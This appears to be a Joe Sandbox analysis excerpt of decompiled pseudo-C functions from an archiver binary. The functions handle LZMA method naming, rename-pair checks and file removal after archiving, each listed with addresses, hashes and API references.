                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: exit$CriticalSection$EnterLeave
                                                                                                    • String ID:
                                                                                                    • API String ID: 43521-0
                                                                                                    • Opcode ID: fa575627897d913deb0e998311f4ccf7de4f62dda3277bacd57c2ddc2bc1053f
                                                                                                    • Instruction ID: bf66afccd2dc56ce7e286cd566ac775ce363fea46a4b0d865ee2cc6dedfc7aaa
                                                                                                    • Opcode Fuzzy Hash: fa575627897d913deb0e998311f4ccf7de4f62dda3277bacd57c2ddc2bc1053f
                                                                                                    • Instruction Fuzzy Hash: 5D11D372100701DFD730AF62C881596B7B1BF44705B404A3FA59B42A92D778B58ACF59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003F82CA Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 181COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 72%
                                                                                                    			E003F82CA() {
				void* __edi;
				intOrPtr _t77;
				signed int _t78;
				signed char _t79;
				void* _t81;
				void* _t83;
				signed int _t84;
				signed char _t85;
				signed int _t87;
				signed char _t88;
				signed char _t90;
				signed char _t92;
				void* _t93;
				signed char _t94;
				void* _t95;
				intOrPtr _t99;
				void* _t109;
				signed char _t110;
				signed int _t111;
				signed int _t117;
				signed int _t123;
				signed int _t125;
				signed int _t137;
				intOrPtr _t138;
				signed int _t144;
				intOrPtr _t149;
				signed char _t150;
				void* _t151;
				void* _t153;
				void* _t156;

				E0041F1B0(E004276F0, _t151);
				_t144 = 0;
				 *((intOrPtr*)(_t151 - 0x10)) = _t153 - 0x38;
				 *((intOrPtr*)(_t151 - 4)) = 0;
				 *((short*)(_t151 - 0x34)) = 0;
				 *((short*)(_t151 - 0x32)) = 0;
				 *((intOrPtr*)(_t151 - 0x2c)) = 0;
				_t77 =  *((intOrPtr*)(_t151 + 0xc));
				 *((char*)(_t151 - 4)) = 1;
				_t156 = _t77 - 0x2c;
				if(_t156 > 0) {
					_t78 = _t77 - 0x2d;
					__eflags = _t78;
					if(_t78 == 0) {
						_t79 =  *(_t151 + 8);
						_push( *((intOrPtr*)(_t79 + 0x1ec)));
						_push( *((intOrPtr*)(_t79 + 0x1e8)));
						goto L56;
					} else {
						_t84 = _t78 - 0x1a;
						__eflags = _t84;
						if(_t84 == 0) {
							_t85 =  *(_t151 + 8);
							__eflags =  *((char*)(_t85 + 0x1f8));
							if( *((char*)(_t85 + 0x1f8)) == 0) {
								_t144 = 1;
							}
							__eflags =  *((char*)(_t85 + 0x1fa));
							if( *((char*)(_t85 + 0x1fa)) != 0) {
								_t144 = _t144 | 0x00000002;
								__eflags = _t144;
							}
							__eflags =  *((char*)(_t85 + 0x1fb));
							if( *((char*)(_t85 + 0x1fb)) != 0) {
								_t144 = _t144 | 0x00000020;
								__eflags = _t144;
							}
							__eflags =  *((char*)(_t85 + 0x1fe));
							if( *((char*)(_t85 + 0x1fe)) != 0) {
								_t144 = _t144 | 0x00000100;
								__eflags = _t144;
							}
							_push(_t144);
							goto L54;
						} else {
							_t87 = _t84 - 1;
							__eflags = _t87;
							if(_t87 == 0) {
								_t88 =  *(_t151 + 8);
								_t123 = 0;
								__eflags =  *(_t88 + 0x1fc);
								if( *(_t88 + 0x1fc) != 0) {
									_t123 = 2;
								}
								__eflags =  *((char*)(_t88 + 0x1fd));
								if( *((char*)(_t88 + 0x1fd)) != 0) {
									_t123 = _t123 | 0x00000001;
									__eflags = _t123;
								}
								__eflags = _t123 - _t144;
								if(_t123 != _t144) {
									_push(_t123);
									goto L54;
								}
							} else {
								__eflags = _t87 == 0x15;
								if(_t87 == 0x15) {
									_t90 =  *(_t151 + 8);
									__eflags =  *((char*)(_t90 + 0x1fa));
									if( *((char*)(_t90 + 0x1fa)) != 0) {
										L37:
										_push(1);
										goto L38;
									} else {
										__eflags =  *((char*)(_t90 + 0x1fb));
										if( *((char*)(_t90 + 0x1fb)) != 0) {
											goto L37;
										} else {
											__eflags =  *((char*)(_t90 + 0x1fc));
											if( *((char*)(_t90 + 0x1fc)) != 0) {
												goto L37;
											} else {
												__eflags =  *((char*)(_t90 + 0x1fe));
												if( *((char*)(_t90 + 0x1fe)) != 0) {
													goto L37;
												}
											}
										}
									}
								}
							}
						}
					}
				} else {
					if(_t156 == 0) {
						_t92 =  *(_t151 + 8);
						_push( *((intOrPtr*)(_t92 + 0x1f4)));
						_push( *((intOrPtr*)(_t92 + 0x1f0)));
						goto L56;
					} else {
						_t93 = _t77 - 0xd;
						if(_t93 == 0) {
							_t94 =  *(_t151 + 8);
							_t125 = 0;
							__eflags = 0;
							_t138 =  *((intOrPtr*)(_t94 + 0xb4));
							while(1) {
								__eflags = _t125 - _t138;
								if(_t125 >= _t138) {
									break;
								}
								_t149 =  *((intOrPtr*)(_t94 + 0xd4));
								__eflags =  *((intOrPtr*)(_t149 + _t125 * 4)) - 1;
								if( *((intOrPtr*)(_t149 + _t125 * 4)) > 1) {
									 *(_t151 + 8) = 1;
								} else {
									_t125 = _t125 + 1;
									continue;
								}
								L27:
								_push( *(_t151 + 8));
								L38:
								E003B9226(_t151 - 0x34);
								goto L57;
							}
							_t46 = _t151 + 8;
							 *_t46 =  *(_t151 + 8) & 0x00000000;
							__eflags =  *_t46;
							goto L27;
						} else {
							_t95 = _t93 - 9;
							if(_t95 == 0) {
								E003B2690(_t151 - 0x24);
								_t150 =  *(_t151 + 8);
								 *((char*)(_t151 - 4)) = 2;
								while(1) {
									__eflags = _t144 -  *((intOrPtr*)(_t150 + 0x100));
									if(_t144 >=  *((intOrPtr*)(_t150 + 0x100))) {
										break;
									}
									_t99 =  *((intOrPtr*)(_t150 + 0xfc));
									 *((intOrPtr*)(_t151 - 0x18)) =  *((intOrPtr*)(_t99 + _t144 * 8));
									_t117 =  *(_t99 + 4 + _t144 * 8);
									E003B2828(_t151 - 0x24);
									__eflags =  *((intOrPtr*)(_t151 - 0x18)) - 0x21;
									if( *((intOrPtr*)(_t151 - 0x18)) != 0x21) {
										L15:
										__eflags =  *((intOrPtr*)(_t151 - 0x18)) - 0x30101;
										if(__eflags != 0) {
											L18:
											_push(_t117);
											_push( *((intOrPtr*)(_t151 - 0x18)));
											_push(_t151 - 0x24);
											E003F81E0(__eflags);
										} else {
											__eflags = _t117;
											if(__eflags != 0) {
												goto L18;
											} else {
												E003B284C(_t151 - 0x24, "LZMA:");
												E003F8550(_t151 - 0x44,  *((intOrPtr*)(_t150 + 0xf8)), _t144);
												goto L14;
											}
										}
									} else {
										__eflags = _t117;
										if(_t117 != 0) {
											goto L15;
										} else {
											E003B284C(_t151 - 0x24, "LZMA2:");
											E003F85C2(_t151 - 0x44,  *(_t150 + 0xf4) & 0x000000ff);
											L14:
											E003B284C(_t151 - 0x24, _t151 - 0x44);
										}
									}
									_t144 = _t144 + 1;
								}
								E003B1E40(E003B91E5(_t151 - 0x34,  *((intOrPtr*)(_t151 - 0x24))),  *((intOrPtr*)(_t151 - 0x24)));
							} else {
								_t109 = _t95 - 0xe;
								if(_t109 == 0) {
									_t110 =  *(_t151 + 8);
									_t137 =  *(_t110 + 0x1b0);
									_t111 =  *(_t110 + 0x1b4);
									__eflags = _t137 | _t111;
									if((_t137 | _t111) != 0) {
										_push(_t111);
										_push(_t137);
										L56:
										E003B9270(_t151 - 0x34);
									}
								} else {
									if(_t109 == 0) {
										_push( *((intOrPtr*)( *(_t151 + 8) + 0xb4)));
										L54:
										E003B924B(_t151 - 0x34);
									}
								}
							}
						}
					}
				}
				L57:
				_t81 = E003B93A2(_t151 - 0x34,  *((intOrPtr*)(_t151 + 0x10)));
				E003B92C9(_t151 - 0x34);
				_t83 = _t81;
				 *[fs:0x0] =  *((intOrPtr*)(_t151 - 0xc));
				return _t83;
			}

































                                                                                                    0x003f82cf
                                                                                                    0x003f82da
                                                                                                    0x003f82dc
                                                                                                    0x003f82df
                                                                                                    0x003f82e2
                                                                                                    0x003f82e6
                                                                                                    0x003f82ea
                                                                                                    0x003f82ed
                                                                                                    0x003f82f0
                                                                                                    0x003f82f4
                                                                                                    0x003f82f7
                                                                                                    0x003f845c
                                                                                                    0x003f845c
                                                                                                    0x003f845f
                                                                                                    0x003f8511
                                                                                                    0x003f8514
                                                                                                    0x003f851a
                                                                                                    0x00000000
                                                                                                    0x003f8465
                                                                                                    0x003f8465
                                                                                                    0x003f8465
                                                                                                    0x003f8468
                                                                                                    0x003f84d0
                                                                                                    0x003f84d3
                                                                                                    0x003f84da
                                                                                                    0x003f84de
                                                                                                    0x003f84de
                                                                                                    0x003f84df
                                                                                                    0x003f84e6
                                                                                                    0x003f84e8
                                                                                                    0x003f84e8
                                                                                                    0x003f84e8
                                                                                                    0x003f84eb
                                                                                                    0x003f84f2
                                                                                                    0x003f84f4
                                                                                                    0x003f84f4
                                                                                                    0x003f84f4
                                                                                                    0x003f84f7
                                                                                                    0x003f84fe
                                                                                                    0x003f8500
                                                                                                    0x003f8500
                                                                                                    0x003f8500
                                                                                                    0x003f8506
                                                                                                    0x00000000
                                                                                                    0x003f846a
                                                                                                    0x003f846a
                                                                                                    0x003f846a
                                                                                                    0x003f846b
                                                                                                    0x003f84ad
                                                                                                    0x003f84b0
                                                                                                    0x003f84b2
                                                                                                    0x003f84b8
                                                                                                    0x003f84bc
                                                                                                    0x003f84bc
                                                                                                    0x003f84bd
                                                                                                    0x003f84c4
                                                                                                    0x003f84c6
                                                                                                    0x003f84c6
                                                                                                    0x003f84c6
                                                                                                    0x003f84c9
                                                                                                    0x003f84cb
                                                                                                    0x003f84cd
                                                                                                    0x00000000
                                                                                                    0x003f84cd
                                                                                                    0x003f846d
                                                                                                    0x003f846d
                                                                                                    0x003f8470
                                                                                                    0x003f8476
                                                                                                    0x003f8479
                                                                                                    0x003f8480
                                                                                                    0x003f84a1
                                                                                                    0x003f84a1
                                                                                                    0x00000000
                                                                                                    0x003f8482
                                                                                                    0x003f8482
                                                                                                    0x003f8489
                                                                                                    0x00000000
                                                                                                    0x003f848b
                                                                                                    0x003f848b
                                                                                                    0x003f8492
                                                                                                    0x00000000
                                                                                                    0x003f8494
                                                                                                    0x003f8494
                                                                                                    0x003f849b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f849b
                                                                                                    0x003f8492
                                                                                                    0x003f8489
                                                                                                    0x003f8480
                                                                                                    0x003f8470
                                                                                                    0x003f846b
                                                                                                    0x003f8468
                                                                                                    0x003f82fd
                                                                                                    0x003f82fd
                                                                                                    0x003f8448
                                                                                                    0x003f844b
                                                                                                    0x003f8451
                                                                                                    0x00000000
                                                                                                    0x003f8303
                                                                                                    0x003f8303
                                                                                                    0x003f8306
                                                                                                    0x003f841b
                                                                                                    0x003f841e
                                                                                                    0x003f841e
                                                                                                    0x003f8420
                                                                                                    0x003f8426
                                                                                                    0x003f8426
                                                                                                    0x003f8428
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f842a
                                                                                                    0x003f8430
                                                                                                    0x003f8434
                                                                                                    0x003f8439
                                                                                                    0x003f8436
                                                                                                    0x003f8436
                                                                                                    0x00000000
                                                                                                    0x003f8436
                                                                                                    0x003f8443
                                                                                                    0x003f8443
                                                                                                    0x003f84a3
                                                                                                    0x003f84a6
                                                                                                    0x00000000
                                                                                                    0x003f84a6
                                                                                                    0x003f843f
                                                                                                    0x003f843f
                                                                                                    0x003f843f
                                                                                                    0x00000000
                                                                                                    0x003f830c
                                                                                                    0x003f830c
                                                                                                    0x003f830f
                                                                                                    0x003f834f
                                                                                                    0x003f8354
                                                                                                    0x003f8357
                                                                                                    0x003f835b
                                                                                                    0x003f835b
                                                                                                    0x003f8361
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f8367
                                                                                                    0x003f8370
                                                                                                    0x003f8376
                                                                                                    0x003f837a
                                                                                                    0x003f837f
                                                                                                    0x003f8383
                                                                                                    0x003f83b3
                                                                                                    0x003f83b3
                                                                                                    0x003f83ba
                                                                                                    0x003f83dd
                                                                                                    0x003f83dd
                                                                                                    0x003f83e1
                                                                                                    0x003f83e6
                                                                                                    0x003f83e7
                                                                                                    0x003f83bc
                                                                                                    0x003f83bc
                                                                                                    0x003f83be
                                                                                                    0x00000000
                                                                                                    0x003f83c0
                                                                                                    0x003f83c8
                                                                                                    0x003f83d6
                                                                                                    0x00000000
                                                                                                    0x003f83d6
                                                                                                    0x003f83be
                                                                                                    0x003f8385
                                                                                                    0x003f8385
                                                                                                    0x003f8387
                                                                                                    0x00000000
                                                                                                    0x003f8389
                                                                                                    0x003f8391
                                                                                                    0x003f83a0
                                                                                                    0x003f83a5
                                                                                                    0x003f83ac
                                                                                                    0x003f83ac
                                                                                                    0x003f8387
                                                                                                    0x003f83ec
                                                                                                    0x003f83ec
                                                                                                    0x003f8400
                                                                                                    0x003f8311
                                                                                                    0x003f8311
                                                                                                    0x003f8314
                                                                                                    0x003f832c
                                                                                                    0x003f832f
                                                                                                    0x003f8335
                                                                                                    0x003f833d
                                                                                                    0x003f833f
                                                                                                    0x003f8345
                                                                                                    0x003f8346
                                                                                                    0x003f8520
                                                                                                    0x003f8523
                                                                                                    0x003f8523
                                                                                                    0x003f8316
                                                                                                    0x003f8318
                                                                                                    0x003f8321
                                                                                                    0x003f8507
                                                                                                    0x003f850a
                                                                                                    0x003f850a
                                                                                                    0x003f8318
                                                                                                    0x003f8314
                                                                                                    0x003f830f
                                                                                                    0x003f8306
                                                                                                    0x003f82fd
                                                                                                    0x003f8528
                                                                                                    0x003f852e
                                                                                                    0x003f8538
                                                                                                    0x003f853d
                                                                                                    0x003f8544
                                                                                                    0x003f854d

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: !$LZMA2:$LZMA:
                                                                                                    • API String ID: 3519838083-3332058968
                                                                                                    • Opcode ID: 01031f419eca1bb75a6455b27bf12ea4a52a03f75c8ebce0c9995ec19191c66b
                                                                                                    • Instruction ID: 97101db31af1159d98b163440b1001f686f44c9be9f0072ed714137515f6d4ca
                                                                                                    • Opcode Fuzzy Hash: 01031f419eca1bb75a6455b27bf12ea4a52a03f75c8ebce0c9995ec19191c66b
                                                                                                    • Instruction Fuzzy Hash: BD61C03590010EAFCF1BCB65C949FFD7BA4AF15308F1540AAE60A6B562DF709E84CB00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003C16BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 109COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 75%
                                                                                                    			E003C16BB(intOrPtr __ecx, signed int __edx) {
				signed int _t51;
				void* _t61;
				void* _t62;
				intOrPtr* _t64;
				intOrPtr* _t69;
				short* _t83;
				signed int _t88;
				intOrPtr _t90;
				signed int _t91;
				signed int _t92;
				void* _t94;

				_t51 = E0041F1B0(E00423614, _t94);
				_t64 =  *((intOrPtr*)(_t94 + 0xc));
				_push(_t91);
				_t92 = _t91 | 0xffffffff;
				_t88 = __edx;
				 *((intOrPtr*)(_t94 - 0x10)) = __ecx;
				if(__ecx != 0 ||  *(_t64 + 4) == __edx) {
					if( *(_t94 + 0x18) == 0) {
						 *(_t94 - 0x16) =  *(_t94 - 0x16) & 0x00000000;
						 *((char*)(_t94 - 0x18)) = 1;
						 *((char*)(_t94 - 0x17)) = 1;
						 *((intOrPtr*)(_t94 - 0x14)) = 2;
						_t61 = E003B2DCD(_t94 - 0x24,  *0x429c70);
						 *(_t94 - 4) =  *(_t94 - 4) & 0x00000000;
						_t62 = E003C1673( *((intOrPtr*)(_t94 + 8)), _t94 - 0x18, _t61);
						 *(_t94 - 4) = _t92;
						_t51 = E003B1E40(_t62,  *(_t94 - 0x24));
					}
				}
				if( *(_t94 + 0x10) < 0) {
					_t51 =  *(_t64 + 4);
					 *(_t94 + 0x10) = _t51;
				}
				 *(_t94 + 0x18) = _t88;
				if(_t88 >=  *(_t64 + 4)) {
					L21:
					 *[fs:0x0] =  *((intOrPtr*)(_t94 - 0xc));
					return _t51;
				} else {
					_t90 =  *((intOrPtr*)(_t94 + 0x14));
					while(1) {
						_t52 =  *_t64;
						_t69 =  *((intOrPtr*)( *_t64 +  *(_t94 + 0x18) * 4));
						if( *((intOrPtr*)(_t69 + 4)) == 0) {
							break;
						}
						if( *(_t94 + 0x18) >=  *(_t94 + 0x10)) {
							L12:
							__eflags =  *((intOrPtr*)(_t94 - 0x10));
							if( *((intOrPtr*)(_t94 - 0x10)) == 0) {
								E003C1673( *((intOrPtr*)(_t94 + 8)), _t90, _t69);
							} else {
								__eflags = _t92 - 0xffffffff;
								if(__eflags != 0) {
									_push( *((intOrPtr*)(_t90 + 1)));
									_push(2);
									_push(_t69);
									L003C1807( *((intOrPtr*)(_t94 - 0x10)),  *((intOrPtr*)(_t52 + _t92 * 4)), __eflags);
									_t92 = _t92 | 0xffffffff;
								} else {
									_t92 =  *(_t94 + 0x18);
								}
							}
							L17:
							 *(_t94 + 0x18) =  *(_t94 + 0x18) + 1;
							_t51 =  *(_t94 + 0x18);
							if(_t51 <  *(_t64 + 4)) {
								continue;
							}
							_t109 = _t92 - 0xffffffff;
							if(_t92 == 0xffffffff) {
								goto L21;
							}
							_push( *((intOrPtr*)( *((intOrPtr*)( *_t64 + _t92 * 4)))));
							_push("There is no second file name for rename pair:");
							E003D097C(_t94 - 0x30, _t109);
							_push(0x431428);
							_push(_t94 - 0x30);
							L0041F1D0();
							break;
						}
						_t83 =  *_t69;
						_t107 =  *_t83 - 0x40;
						if( *_t83 != 0x40) {
							goto L12;
						}
						_push( *((intOrPtr*)(_t94 + 0x1c)));
						_push(_t83 + 2);
						_push(_t90);
						L003C18C6( *((intOrPtr*)(_t94 - 0x10)),  *((intOrPtr*)(_t94 + 8)), _t107);
						goto L17;
					}
					_push(0);
					_push( *0x429c80);
					E003D097C(_t94 - 0x24, _t109);
					_t51 = _t94 - 0x24;
					_push(0x431428);
					_push(_t51);
					L0041F1D0();
					goto L21;
				}
			}














                                                                                                    0x003c16c0
                                                                                                    0x003c16c9
                                                                                                    0x003c16cc
                                                                                                    0x003c16cd
                                                                                                    0x003c16d1
                                                                                                    0x003c16d5
                                                                                                    0x003c16d8
                                                                                                    0x003c16e3
                                                                                                    0x003c16eb
                                                                                                    0x003c16f2
                                                                                                    0x003c16f6
                                                                                                    0x003c16fa
                                                                                                    0x003c1701
                                                                                                    0x003c1709
                                                                                                    0x003c1711
                                                                                                    0x003c1716
                                                                                                    0x003c171c
                                                                                                    0x003c1721
                                                                                                    0x003c16e3
                                                                                                    0x003c1726
                                                                                                    0x003c1728
                                                                                                    0x003c172b
                                                                                                    0x003c172b
                                                                                                    0x003c1731
                                                                                                    0x003c1734
                                                                                                    0x003c17f6
                                                                                                    0x003c17fc
                                                                                                    0x003c1804
                                                                                                    0x003c173a
                                                                                                    0x003c173a
                                                                                                    0x003c173d
                                                                                                    0x003c173d
                                                                                                    0x003c1742
                                                                                                    0x003c1749
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c1755
                                                                                                    0x003c1774
                                                                                                    0x003c1774
                                                                                                    0x003c1778
                                                                                                    0x003c17a1
                                                                                                    0x003c177a
                                                                                                    0x003c177a
                                                                                                    0x003c177d
                                                                                                    0x003c1787
                                                                                                    0x003c178b
                                                                                                    0x003c178d
                                                                                                    0x003c1791
                                                                                                    0x003c1796
                                                                                                    0x003c177f
                                                                                                    0x003c177f
                                                                                                    0x003c177f
                                                                                                    0x003c177d
                                                                                                    0x003c17a6
                                                                                                    0x003c17a6
                                                                                                    0x003c17a9
                                                                                                    0x003c17af
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c17b1
                                                                                                    0x003c17b4
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c17be
                                                                                                    0x003c17c0
                                                                                                    0x003c17c5
                                                                                                    0x003c17cd
                                                                                                    0x003c17d2
                                                                                                    0x003c17d3
                                                                                                    0x00000000
                                                                                                    0x003c17d3
                                                                                                    0x003c1757
                                                                                                    0x003c1759
                                                                                                    0x003c175d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c175f
                                                                                                    0x003c1768
                                                                                                    0x003c176c
                                                                                                    0x003c176d
                                                                                                    0x00000000
                                                                                                    0x003c176d
                                                                                                    0x003c17d8
                                                                                                    0x003c17dd
                                                                                                    0x003c17e3
                                                                                                    0x003c17e8
                                                                                                    0x003c17eb
                                                                                                    0x003c17f0
                                                                                                    0x003c17f1
                                                                                                    0x00000000
                                                                                                    0x003c17f1

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003C16C0
                                                                                                    • _CxxThrowException.MSVCRT(?,00431428), ref: 003C17D3
                                                                                                    • _CxxThrowException.MSVCRT(?,00431428), ref: 003C17F1
                                                                                                      • Part of subcall function 003C1807: __EH_prolog.LIBCMT ref: 003C180C
                                                                                                      • Part of subcall function 003C1807: _CxxThrowException.MSVCRT(?,00431428), ref: 003C18B0
                                                                                                    Strings
                                                                                                    • There is no second file name for rename pair:, xrefs: 003C17C0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionThrow$H_prolog
                                                                                                    • String ID: There is no second file name for rename pair:
                                                                                                    • API String ID: 206451386-3412818124
                                                                                                    • Opcode ID: cd37f7a45f2d7597c50a0500cbb4a480b28c29029e932ab0be04a1713274bcb9
                                                                                                    • Instruction ID: 3f1245411831d5f4800d41ac0b2e10f152251fee199ea10e6d57485a64de9f64
                                                                                                    • Opcode Fuzzy Hash: cd37f7a45f2d7597c50a0500cbb4a480b28c29029e932ab0be04a1713274bcb9
                                                                                                    • Instruction Fuzzy Hash: 5B418B31900109EBCF12DF94C881FEEBBB5AB5A314F10815DF811AB292C770AD92DBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003EC2B3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 83COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 96%
                                                                                                    			E003EC2B3(void* __ecx, void* __ebp) {
				intOrPtr _v0;
				char* _t64;
				char** _t65;
				struct _IO_FILE** _t66;
				void* _t67;

				_t67 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xc8)) <= 0 ||  *(__ecx + 0xb8) == 0) {
					L7:
					_t64 = _t67 + 0x120;
					if( *((intOrPtr*)(_t67 + 0x120)) != 0) {
						 *((intOrPtr*)(_t67 + 0x18)) =  *((intOrPtr*)(_t67 + 0x18)) + 1;
						asm("adc [esi+0x1c], ebx");
					} else {
						if( *((intOrPtr*)(_t67 + 0xac)) != 0) {
							E003EB5D3(_t67 + 8);
						}
						 *_t64 = 1;
					}
					if( *((intOrPtr*)(_t67 + 0xac)) != 0) {
						E003B2711(_t67 + 0x20, "Removing");
						E003B2F2F(_t67 + 0x2c, _v0);
						E003EB734(_t67 + 8);
					}
					return 0;
				} else {
					L003E5BC2(__ecx + 8);
					if( *((intOrPtr*)(__ecx + 0x120)) == 0) {
						_t66 =  *(__ecx + 0xb8);
						if(_t66 != 0) {
							E003B1FA0(_t66);
							fputs(": Removing files after including to archive",  *_t66);
							E003B1FA0(_t66);
						}
					}
					_t65 = _t67 + 0xcc;
					E003B2711(_t65, "Removing");
					E003B2820();
					fputs( *_t65,  *( *(_t67 + 0xb8)));
					_t70 = _t67 + 0xd8;
					E003B2F2F(_t67 + 0xd8, _v0);
					E003B209A( *(_t67 + 0xb8), _t70);
					E003B2010( *(_t67 + 0xb8), _t70, _t65);
					E003B1FA0( *(_t67 + 0xb8));
					if( *((intOrPtr*)(_t67 + 0xc1)) != 0) {
						L003B1F91( *(_t67 + 0xb8));
					}
					goto L7;
				}
			}








                                                                                                    0x003ec2b5
                                                                                                    0x003ec2c0
                                                                                                    0x003ec37c
                                                                                                    0x003ec382
                                                                                                    0x003ec388
                                                                                                    0x003ec39f
                                                                                                    0x003ec3a3
                                                                                                    0x003ec38a
                                                                                                    0x003ec390
                                                                                                    0x003ec395
                                                                                                    0x003ec395
                                                                                                    0x003ec39a
                                                                                                    0x003ec39a
                                                                                                    0x003ec3ac
                                                                                                    0x003ec3b6
                                                                                                    0x003ec3c2
                                                                                                    0x003ec3ca
                                                                                                    0x003ec3ca
                                                                                                    0x003ec3d4
                                                                                                    0x003ec2d2
                                                                                                    0x003ec2d6
                                                                                                    0x003ec2e7
                                                                                                    0x003ec2e9
                                                                                                    0x003ec2f1
                                                                                                    0x003ec2f5
                                                                                                    0x003ec301
                                                                                                    0x003ec307
                                                                                                    0x003ec307
                                                                                                    0x003ec2f1
                                                                                                    0x003ec30c
                                                                                                    0x003ec319
                                                                                                    0x003ec320
                                                                                                    0x003ec32f
                                                                                                    0x003ec332
                                                                                                    0x003ec33f
                                                                                                    0x003ec34b
                                                                                                    0x003ec358
                                                                                                    0x003ec363
                                                                                                    0x003ec36f
                                                                                                    0x003ec377
                                                                                                    0x003ec377
                                                                                                    0x00000000
                                                                                                    0x003ec36f

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputs$fputc
                                                                                                    • String ID: : Removing files after including to archive$Removing
                                                                                                    • API String ID: 1185151155-1218467041
                                                                                                    • Opcode ID: 352e36ba5ed9653f2d9a53f2a747cab4cf8e647d5eef80832fefeeddb26abc00
                                                                                                    • Instruction ID: f589229da3c22702dced6b7d12b9f448e7a52f411af48d66a777ffad2777df42
                                                                                                    • Opcode Fuzzy Hash: 352e36ba5ed9653f2d9a53f2a747cab4cf8e647d5eef80832fefeeddb26abc00
                                                                                                    • Instruction Fuzzy Hash: 9C31C2326107808FC767AB71D891BFFB3A6AF84300F404A1EE19B0A492DF343889CB15
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003EC86C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 94%
                                                                                                    			E003EC86C(void* __ecx) {
				void* __edi;
				void* _t40;
				struct _IO_FILE** _t54;
				void* _t57;
				void* _t59;

				E0041F1B0(E004269F8, _t59);
				_t57 = __ecx;
				if( *((intOrPtr*)(_t59 + 8)) != 0) {
					_t40 = __ecx + 8;
					if( *((intOrPtr*)(__ecx + 0xac)) != 0) {
						E003EB5FA(_t40, 0, 1);
					}
					if( *(_t57 + 0xbc) != 0) {
						_t41 =  *((intOrPtr*)(_t57 + 0xb8));
						if( *((intOrPtr*)(_t57 + 0xb8)) != 0) {
							L003B1F91(_t41);
						}
						E003B2690(_t59 - 0x18);
						 *((intOrPtr*)(_t59 - 4)) = 0;
						E003E4BAC( *((intOrPtr*)(_t59 + 8)),  *((intOrPtr*)(_t59 + 0xc)), _t59, _t59 - 0x18);
						_t54 =  *(_t57 + 0xbc);
						fputs( *(_t59 - 0x18),  *_t54);
						fputs(" : ",  *_t54);
						E003B1FA0(_t54);
						_push( *((intOrPtr*)(_t59 + 0x10)));
						E003B211A( *(_t57 + 0xbc));
						E003B1FA0( *(_t57 + 0xbc));
						E003B1FA0( *(_t57 + 0xbc));
						E003B1E40(L003B1F91( *(_t57 + 0xbc)),  *(_t59 - 0x18));
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
				return 0;
			}








                                                                                                    0x003ec871
